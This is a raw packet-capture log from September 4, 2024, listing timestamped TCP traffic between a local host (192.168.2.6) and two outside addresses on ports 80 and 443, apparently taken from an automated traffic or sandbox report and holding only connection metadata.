Sep 4, 2024 17:37:08.890216112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890227079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890233040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890237093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890248060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890253067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890263081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890268087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890275002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890285015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890285969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890295982 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890305042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890324116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890331984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890342951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890342951 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890352011 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890361071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890373945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890392065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890427113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890435934 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890445948 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890471935 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890494108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890588999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890599012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890608072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890618086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890623093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890625000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890631914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890633106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890645981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890645981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890665054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890683889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890690088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890698910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890707016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890717983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890726089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890726089 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890733004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890741110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890769958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890897989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890908003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890916109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.890937090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890937090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.890952110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.891002893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891011953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891020060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891030073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891052008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.891077042 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.891155005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891165018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891174078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891182899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891196012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.891201019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891213894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891213894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.891235113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.891253948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.891486883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.891525984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.892620087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.892658949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.892699003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.892712116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.892743111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.892822981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.892855883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.892887115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.892898083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.892911911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.892926931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.892935991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.892951012 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.918559074 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.918576002 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.918606043 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.918615103 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.918633938 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.918651104 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.919961929 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.919975996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.920026064 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.920032978 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.920073986 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.921941996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.921957016 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.922005892 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.922013998 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.922055006 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.923069000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923115969 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923162937 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923176050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923202991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923222065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923417091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923427105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923458099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923461914 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923469067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923491001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923506975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923861980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923872948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923881054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923890114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923899889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923907995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923908949 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923921108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923932076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923938036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923943043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923949957 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923954010 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.923970938 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.923990011 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924124956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924139023 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924146891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924170971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924170971 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924603939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924614906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924623013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924632072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924640894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924640894 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924649954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924660921 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924662113 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924669981 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924680948 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924681902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924695015 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924717903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924906969 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924916029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924932003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924942017 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924949884 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924949884 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924957991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.924962044 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924972057 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924983025 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.924983978 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925005913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925021887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925095081 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925103903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925132036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925138950 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925303936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925314903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925323009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925343037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925363064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925395966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925406933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925415039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925425053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925431967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925432920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925441980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925451994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925452948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925462008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925471067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.925472975 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925489902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.925508022 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926084042 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926093102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926105976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926117897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926126957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926129103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926136971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926146984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926151037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926152945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926165104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926175117 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926177025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926181078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926184893 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926187038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926198006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926206112 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926215887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926218033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926229000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926235914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926239014 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926253080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926271915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926271915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926286936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926299095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926301956 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.926306963 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926315069 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.926321030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926322937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926363945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926366091 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.926373959 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.926389933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926409960 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.926539898 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926551104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926558971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926569939 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.926575899 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926594973 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926611900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.926784992 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.926799059 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.926861048 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.926867008 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.926908016 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.928510904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928520918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928529024 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928538084 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928549051 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928553104 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928564072 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928569078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928572893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928589106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928606033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928611040 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928617001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928627968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928638935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928644896 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.928652048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928653002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928656101 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928658009 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928662062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.928664923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928669930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928694963 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928698063 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.928703070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928709030 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.928714037 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.928716898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928724051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928736925 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928740978 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928746939 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.928747892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928754091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928764105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928774118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928776026 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928782940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928785086 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928796053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928802013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928805113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928817034 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928817987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928828001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928837061 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928839922 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928847075 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928855896 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928862095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928867102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.928884983 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.928891897 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.929507971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929517984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929526091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929533958 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929538965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929543018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929548025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.929552078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929560900 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.929578066 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.929600954 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.929636955 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.929653883 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.929682016 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.929687023 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.929708958 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.929716110 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.931917906 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.931938887 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.931987047 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.931993008 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:08.932008982 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.932027102 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:08.934303999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934346914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.934380054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934422016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.934554100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934592962 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.934611082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934619904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934649944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.934658051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934667110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934674978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.934691906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.934704065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.958842039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.958853960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.958863020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.958913088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.958946943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.958952904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.958967924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.958976984 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.958987951 CEST	80	49719	147.45.44.104	192.168.2.6
